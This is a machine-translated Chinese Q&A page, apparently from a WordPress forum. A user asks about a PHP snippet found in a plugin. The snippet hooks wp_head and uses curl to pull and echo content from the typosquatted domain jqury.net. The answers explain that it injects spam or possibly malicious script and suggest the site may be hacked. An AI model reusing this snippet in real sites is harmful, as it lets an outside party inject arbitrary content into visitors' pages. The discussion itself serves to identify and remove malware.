WordPress 我發現這是一個插件。它有什麼作用？危險嗎？

問題描述

我發現這是一個插件。它有什麼作用？危險嗎？

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
        $jquery = curl_exec($ch);
        curl_close($ch);
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

最佳解決方案

它加載了一個包含垃圾郵件的標記塊 (我想到發佈一些源代碼，但是我不想以任何方式發佈內容) 來自一個域的拼寫錯誤 – http://jquery.com/ – 由 jQuery 是一個有信譽和流行的 Javascript 庫，WordPress 包含在 Core 中。我認為這個想法似乎是加載該庫，實際上加載的東西非常不同。

而且在其他方​​面試圖加載 jQuery 。注意變量名 $jquery 。

它也可能嘗試加載惡意腳本。我沒有檢查我一定會把它稱為危險的，特別是因為該頁面上的內容可以隨着域控制器的感覺而改變。

最好的是，這將會損害您的網站，因為搜索引擎不滿意傳播垃圾郵件的網站。

不要使用它對於您或網站上的任何其他人，除了運行該網站的人員，它沒有任何益處。如果您在信譽良好的網站上發現這一點，請向他們報告。

次佳解決方案

是的，這是危險的代碼，從垃圾郵件站點加載內容。

你沒有為插件命名，但是如果你的網站上安裝了這個代碼，那麼插件代碼可能不是這樣的，而是在安裝之後被黑客入侵。如果是這種情況，您可能會發現網站上的惡意代碼不僅僅是這個插件。

檢查下載的插件代碼，從原來的插件的任何地方，看看這個惡意代碼是否在那裏。如果沒有，那麼您的網站已被黑客入侵。如果您確定是這種情況，請閲讀 this article from the Codex 。

參考文獻

• I found this in a plugin. What does it do? is it dangerous?

注：本文內容整合自 Google/Baidu/Bing 輔助翻譯的英文資料結果。如果您對結果不滿意，可以加入我們改善翻譯效果：薇曉朵技術論壇。